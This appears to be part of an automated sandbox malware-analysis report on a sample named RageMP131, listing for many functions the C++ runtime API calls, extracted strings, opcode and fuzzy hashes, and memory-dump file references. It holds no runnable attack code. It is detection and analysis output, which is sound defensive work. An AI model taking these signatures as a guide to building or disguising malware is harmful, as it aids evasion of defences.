                                  • Opcode ID: 89bcd8f281e8e30f4087adecd1507c6131f3705ee8ed7c3b278c332ff666381a
                                  • Instruction ID: d82aae48d67053eaf2eb3db1fcc2e54941fe058f4d4c60fd3960f3ccd8ccd8a0
                                  • Opcode Fuzzy Hash: 89bcd8f281e8e30f4087adecd1507c6131f3705ee8ed7c3b278c332ff666381a
                                  • Instruction Fuzzy Hash: 40C147B19002488FDB19CFA8D984B9EFBF5FB49300F14866DE419EB791E774A9808F50
                                  APIs
                                  • ___std_exception_copy.LIBVCRUNTIME ref: 002C32C6
                                  • ___std_exception_destroy.LIBVCRUNTIME ref: 002C3350
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.4146167296.00000000002C1000.00000040.00000001.01000000.00000006.sdmp, Offset: 002C0000, based on PE: true
                                  • Associated: 00000007.00000002.4145584611.00000000002C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4146167296.00000000003F3000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147267330.00000000003F8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.00000000003FC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.0000000000585000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.000000000066B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.00000000006A0000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.00000000006AC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.00000000006BA000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147847240.00000000006BB000.00000080.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4148165343.0000000000862000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_2c0000_RageMP131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ___std_exception_copy___std_exception_destroy
                                  • String ID: +4,$@3,$`!,$`!,
                                  • API String ID: 2970364248-3618221396
                                  • Opcode ID: 52d4f94a023961a687025cfeaf01a1f50f44adcf34dbe80784d60ca07c93c970
                                  • Instruction ID: fcff9a33369a1ccaff54f113f1dc1e9f7b487d1f19138f880c5f5b4d75ab2852
                                  • Opcode Fuzzy Hash: 52d4f94a023961a687025cfeaf01a1f50f44adcf34dbe80784d60ca07c93c970
                                  • Instruction Fuzzy Hash: F751BC71A102589FCB09CF98D885FEEBBB9FF49300F14862DE815E7381D770AA418B91
                                  APIs
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 002C3A58
                                  • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 002C3AA4
                                  • __Getctype.LIBCPMT ref: 002C3ABA
                                  • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 002C3AE6
                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 002C3B7B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.4146167296.00000000002C1000.00000040.00000001.01000000.00000006.sdmp, Offset: 002C0000, based on PE: true
                                  • Associated: 00000007.00000002.4145584611.00000000002C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4146167296.00000000003F3000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147267330.00000000003F8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.00000000003FC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.0000000000585000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.000000000066B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.00000000006A0000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.00000000006AC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.00000000006BA000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147847240.00000000006BB000.00000080.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4148165343.0000000000862000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_2c0000_RageMP131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: std::_$Locinfo::_Lockit$GetctypeLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_
                                  • String ID: bad locale name
                                  • API String ID: 1840309910-1405518554
                                  • Opcode ID: e36aa50c78bc88faadc7ffe906281f20477be9ed329a3cbfbe0a1c52ff1da6db
                                  • Instruction ID: ce7dde66f17cb8d015d71b1639d42a41b8527ce08a15aacfceb127d988bdb8cf
                                  • Opcode Fuzzy Hash: e36aa50c78bc88faadc7ffe906281f20477be9ed329a3cbfbe0a1c52ff1da6db
                                  • Instruction Fuzzy Hash: 2B5180B1D002089FEF11DFA4D845F8EBBB8EF14314F148569E809AB341E775DA14CBA1
                                  APIs
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 0032DE93
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 0032DEB6
                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 0032DED6
                                  • std::_Facet_Register.LIBCPMT ref: 0032DF4B
                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 0032DF63
                                  • Concurrency::cancel_current_task.LIBCPMT ref: 0032DF7B
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.4146167296.00000000002C1000.00000040.00000001.01000000.00000006.sdmp, Offset: 002C0000, based on PE: true
                                  • Associated: 00000007.00000002.4145584611.00000000002C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4146167296.00000000003F3000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147267330.00000000003F8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.00000000003FC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.0000000000585000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.000000000066B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.00000000006A0000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.00000000006AC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.00000000006BA000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147847240.00000000006BB000.00000080.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4148165343.0000000000862000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_2c0000_RageMP131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                  • String ID:
                                  • API String ID: 2081738530-0
                                  • Opcode ID: 0e4bff71e461c6a6dcc3bb92afc927025e247c025320dd96e0779962ef1b8e2c
                                  • Instruction ID: 806a0a4ee7a9027488b30f048f0031ac7f78f7ea088439ad973384b94172c710
                                  • Opcode Fuzzy Hash: 0e4bff71e461c6a6dcc3bb92afc927025e247c025320dd96e0779962ef1b8e2c
                                  • Instruction Fuzzy Hash: 2C41F371D00229EFCF16DF54E946AAEBBB8FB04720F254269E815AB352D731AD00CBD5
                                  APIs
                                  • ___std_exception_copy.LIBVCRUNTIME ref: 002C7340
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.4146167296.00000000002C1000.00000040.00000001.01000000.00000006.sdmp, Offset: 002C0000, based on PE: true
                                  • Associated: 00000007.00000002.4145584611.00000000002C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4146167296.00000000003F3000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147267330.00000000003F8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.00000000003FC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.0000000000585000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.000000000066B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.00000000006A0000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.00000000006AC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.00000000006BA000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147847240.00000000006BB000.00000080.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4148165343.0000000000862000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_2c0000_RageMP131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ___std_exception_copy
                                  • String ID: `!,$`!,$parse error$parse_error
                                  • API String ID: 2659868963-1006035392
                                  • Opcode ID: 8cd3bcd93a3b2557a1c8209c409e96c6ee2af055fe3b0c931fb06a96a8dd8bda
                                  • Instruction ID: 9ae3b6f9146255615c20dee7ba9a1efb1b854a0f3ab4754a4d1f45dd5981581a
                                  • Opcode Fuzzy Hash: 8cd3bcd93a3b2557a1c8209c409e96c6ee2af055fe3b0c931fb06a96a8dd8bda
                                  • Instruction Fuzzy Hash: 2EE180709142488FDB19CF68C884B9DBBB5FF49300F2482ADE419EB792D7749A91CF91
                                  APIs
                                  • ___std_exception_destroy.LIBVCRUNTIME ref: 002C75BE
                                  • ___std_exception_destroy.LIBVCRUNTIME ref: 002C75CD
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.4146167296.00000000002C1000.00000040.00000001.01000000.00000006.sdmp, Offset: 002C0000, based on PE: true
                                  • Associated: 00000007.00000002.4145584611.00000000002C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4146167296.00000000003F3000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147267330.00000000003F8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.00000000003FC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.0000000000585000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.000000000066B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.00000000006A0000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.00000000006AC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.00000000006BA000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147847240.00000000006BB000.00000080.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4148165343.0000000000862000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_2c0000_RageMP131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ___std_exception_destroy
                                  • String ID: at line $, column $`!,
                                  • API String ID: 4194217158-4202377963
                                  • Opcode ID: 2f3aca66b85c28655bf017df4ae2f95d8957d8dc7eef54b921db3a2699b2975b
                                  • Instruction ID: 95bcbe514ab9d85a1368d2a35ad8f3de8fcc9166a9e0756f5520c00476279486
                                  • Opcode Fuzzy Hash: 2f3aca66b85c28655bf017df4ae2f95d8957d8dc7eef54b921db3a2699b2975b
                                  • Instruction Fuzzy Hash: 5361F270A102049FDB1DCF68DC84BADBBB6FF45300F24862CE415ABB81D774AA548B90
                                  APIs
                                    • Part of subcall function 002C3190: ___std_exception_copy.LIBVCRUNTIME ref: 002C32C6
                                  • ___std_exception_copy.LIBVCRUNTIME ref: 002C345F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.4146167296.00000000002C1000.00000040.00000001.01000000.00000006.sdmp, Offset: 002C0000, based on PE: true
                                  • Associated: 00000007.00000002.4145584611.00000000002C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4146167296.00000000003F3000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147267330.00000000003F8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.00000000003FC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.0000000000585000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.000000000066B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.00000000006A0000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.00000000006AC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.00000000006BA000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147847240.00000000006BB000.00000080.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4148165343.0000000000862000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_2c0000_RageMP131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ___std_exception_copy
                                  • String ID: +4,$@3,$@3,$`!,
                                  • API String ID: 2659868963-1443510104
                                  • Opcode ID: f645f1abb756e67c29598abb2d5918c7e000217a19d2455a6f758c8b8ec95f92
                                  • Instruction ID: 68f15a29851d4798c8bfa9e54581a23a0309fe96e9779fefc060270f61809815
                                  • Opcode Fuzzy Hash: f645f1abb756e67c29598abb2d5918c7e000217a19d2455a6f758c8b8ec95f92
                                  • Instruction Fuzzy Hash: 0E3183759002099FCB19DFA8D841EEEFBF9FB09310F14862EE515D7641E770AA50CB90
                                  APIs
                                  • ___std_exception_copy.LIBVCRUNTIME ref: 002C345F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.4146167296.00000000002C1000.00000040.00000001.01000000.00000006.sdmp, Offset: 002C0000, based on PE: true
                                  • Associated: 00000007.00000002.4145584611.00000000002C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4146167296.00000000003F3000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147267330.00000000003F8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.00000000003FC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.0000000000585000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.000000000066B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.00000000006A0000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.00000000006AC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.00000000006BA000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147847240.00000000006BB000.00000080.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4148165343.0000000000862000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_2c0000_RageMP131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ___std_exception_copy
                                  • String ID: +4,$@3,$@3,$`!,
                                  • API String ID: 2659868963-1443510104
                                  • Opcode ID: e69a750ecc1df1fe38bfa402db9b7ea98f17a4bd210f7054a6817afad410cf05
                                  • Instruction ID: 98ca65bc141818e9e8be821c03711afb18b3f91a49789e512eb075c25b964425
                                  • Opcode Fuzzy Hash: e69a750ecc1df1fe38bfa402db9b7ea98f17a4bd210f7054a6817afad410cf05
                                  • Instruction Fuzzy Hash: 4F01FFB6500609AF8709DFA9D445D96FBFDEF45310700856AE619C7611E7B0E524CB90
                                  APIs
                                  • ___std_exception_destroy.LIBVCRUNTIME ref: 002C6F11
                                  • ___std_exception_destroy.LIBVCRUNTIME ref: 002C6F20
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.4146167296.00000000002C1000.00000040.00000001.01000000.00000006.sdmp, Offset: 002C0000, based on PE: true
                                  • Associated: 00000007.00000002.4145584611.00000000002C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4146167296.00000000003F3000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147267330.00000000003F8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.00000000003FC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.0000000000585000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.000000000066B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.00000000006A0000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.00000000006AC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.00000000006BA000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147847240.00000000006BB000.00000080.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4148165343.0000000000862000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_2c0000_RageMP131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ___std_exception_destroy
                                  • String ID: [json.exception.$`!,
                                  • API String ID: 4194217158-4272543052
                                  • Opcode ID: 6b5fe7bf6d439631cca7e0d7b519aafcf7bab3b455747d88b61b463015c3205f
                                  • Instruction ID: 9b4939c686bf724d6650fca8faa27e0feda52fcc9ddecf4e3340a0870fbf2473
                                  • Opcode Fuzzy Hash: 6b5fe7bf6d439631cca7e0d7b519aafcf7bab3b455747d88b61b463015c3205f
                                  • Instruction Fuzzy Hash: DB91C170A102089FDB19CF68D888F9EBBF6EF45300F20866DE415EB792D771AA41CB51
                                  APIs
                                  • std::_Xinvalid_argument.LIBCPMT ref: 002C2275
                                    • Part of subcall function 0039D6E9: std::invalid_argument::invalid_argument.LIBCONCRT ref: 0039D6F5
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.4146167296.00000000002C1000.00000040.00000001.01000000.00000006.sdmp, Offset: 002C0000, based on PE: true
                                  • Associated: 00000007.00000002.4145584611.00000000002C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4146167296.00000000003F3000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147267330.00000000003F8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.00000000003FC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.0000000000585000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.000000000066B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.00000000006A0000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.00000000006AC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.00000000006BA000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147847240.00000000006BB000.00000080.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4148165343.0000000000862000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_2c0000_RageMP131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Xinvalid_argumentstd::_std::invalid_argument::invalid_argument
                                  • String ID: string too long$L?$L?
                                  • API String ID: 1997705970-123487069
                                  • Opcode ID: f4c5f38f9d7aad4239cc08b5c8beb98812d1db4da204b6c8ef3914b0f73c37bd
                                  • Instruction ID: dd925a892a296c18c71e297c9e71156b01bd94b2ad6d4369200f4fd4078f83bc
                                  • Opcode Fuzzy Hash: f4c5f38f9d7aad4239cc08b5c8beb98812d1db4da204b6c8ef3914b0f73c37bd
                                  • Instruction Fuzzy Hash: 72815875A14286DFCB16CF68C450BEEBFB5EF5A300F1842AEC85497742CB744559CBA0
                                  APIs
                                  • ___std_exception_copy.LIBVCRUNTIME ref: 002C77B4
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.4146167296.00000000002C1000.00000040.00000001.01000000.00000006.sdmp, Offset: 002C0000, based on PE: true
                                  • Associated: 00000007.00000002.4145584611.00000000002C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4146167296.00000000003F3000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147267330.00000000003F8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.00000000003FC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.0000000000585000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.000000000066B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.00000000006A0000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.00000000006AC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.00000000006BA000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147847240.00000000006BB000.00000080.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4148165343.0000000000862000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_2c0000_RageMP131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ___std_exception_copy
                                  • String ID: `!,$`!,$invalid_iterator
                                  • API String ID: 2659868963-2975477599
                                  • Opcode ID: f9af32ae31d2764dde020eaa00b297af1a64b1b99441c18947169715aac168fc
                                  • Instruction ID: 7ae622d35bd49e252d91b1580ade8475b775a18f1358f4fd674cc29e4d7ff7c1
                                  • Opcode Fuzzy Hash: f9af32ae31d2764dde020eaa00b297af1a64b1b99441c18947169715aac168fc
                                  • Instruction Fuzzy Hash: 945126B49002488FDB19CFA8D984B9DFBF5BB49300F14866DE419EB791E774A984CF90
                                  APIs
                                  • ___std_exception_copy.LIBVCRUNTIME ref: 002C7D67
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.4146167296.00000000002C1000.00000040.00000001.01000000.00000006.sdmp, Offset: 002C0000, based on PE: true
                                  • Associated: 00000007.00000002.4145584611.00000000002C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4146167296.00000000003F3000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147267330.00000000003F8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.00000000003FC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.0000000000585000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.000000000066B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.00000000006A0000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.00000000006AC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.00000000006BA000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147847240.00000000006BB000.00000080.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4148165343.0000000000862000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_2c0000_RageMP131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ___std_exception_copy
                                  • String ID: `!,$`!,$other_error
                                  • API String ID: 2659868963-91030564
                                  • Opcode ID: 077acc363295ce71f6880b237dd8b78ac49714c166a982cdc643bcf0d492710f
                                  • Instruction ID: 785aa8b9ee2df5d97bb8491778ea8565d8532ccb9fd89f2783a7e48f45b68474
                                  • Opcode Fuzzy Hash: 077acc363295ce71f6880b237dd8b78ac49714c166a982cdc643bcf0d492710f
                                  • Instruction Fuzzy Hash: FB5159B09102488FDB19CFA8D984BADBBF5BF49300F14826DE41AEB781D774A980CF50
                                  APIs
                                  • ___std_exception_copy.LIBVCRUNTIME ref: 0032D06F
                                  • ___std_exception_copy.LIBVCRUNTIME ref: 0032D096
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.4146167296.00000000002C1000.00000040.00000001.01000000.00000006.sdmp, Offset: 002C0000, based on PE: true
                                  • Associated: 00000007.00000002.4145584611.00000000002C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4146167296.00000000003F3000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147267330.00000000003F8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.00000000003FC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.0000000000585000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.000000000066B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.00000000006A0000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.00000000006AC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.00000000006BA000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147847240.00000000006BB000.00000080.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4148165343.0000000000862000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_2c0000_RageMP131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ___std_exception_copy
                                  • String ID: `!,$`!,
                                  • API String ID: 2659868963-131796292
                                  • Opcode ID: fda45eaca5a2a3375049ca3a9f1f0e42212fab633ab1c617919edb592068f32d
                                  • Instruction ID: cd66280b534122bc97cfea25501ddb8ce24887227b71baafc4e819a4882c7814
                                  • Opcode Fuzzy Hash: fda45eaca5a2a3375049ca3a9f1f0e42212fab633ab1c617919edb592068f32d
                                  • Instruction Fuzzy Hash: 3801A8B6500605AFC709DF59D505882FBF8FB45710701852FA52ACBB10D7B0F528CFA0
                                  APIs
                                  • ___std_exception_copy.LIBVCRUNTIME ref: 0033B3DF
                                  • ___std_exception_copy.LIBVCRUNTIME ref: 0033B406
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.4146167296.00000000002C1000.00000040.00000001.01000000.00000006.sdmp, Offset: 002C0000, based on PE: true
                                  • Associated: 00000007.00000002.4145584611.00000000002C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4146167296.00000000003F3000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147267330.00000000003F8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.00000000003FC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.0000000000585000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.000000000066B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.00000000006A0000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.00000000006AC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.00000000006BA000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147847240.00000000006BB000.00000080.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4148165343.0000000000862000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_2c0000_RageMP131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ___std_exception_copy
                                  • String ID: `!,$`!,
                                  • API String ID: 2659868963-131796292
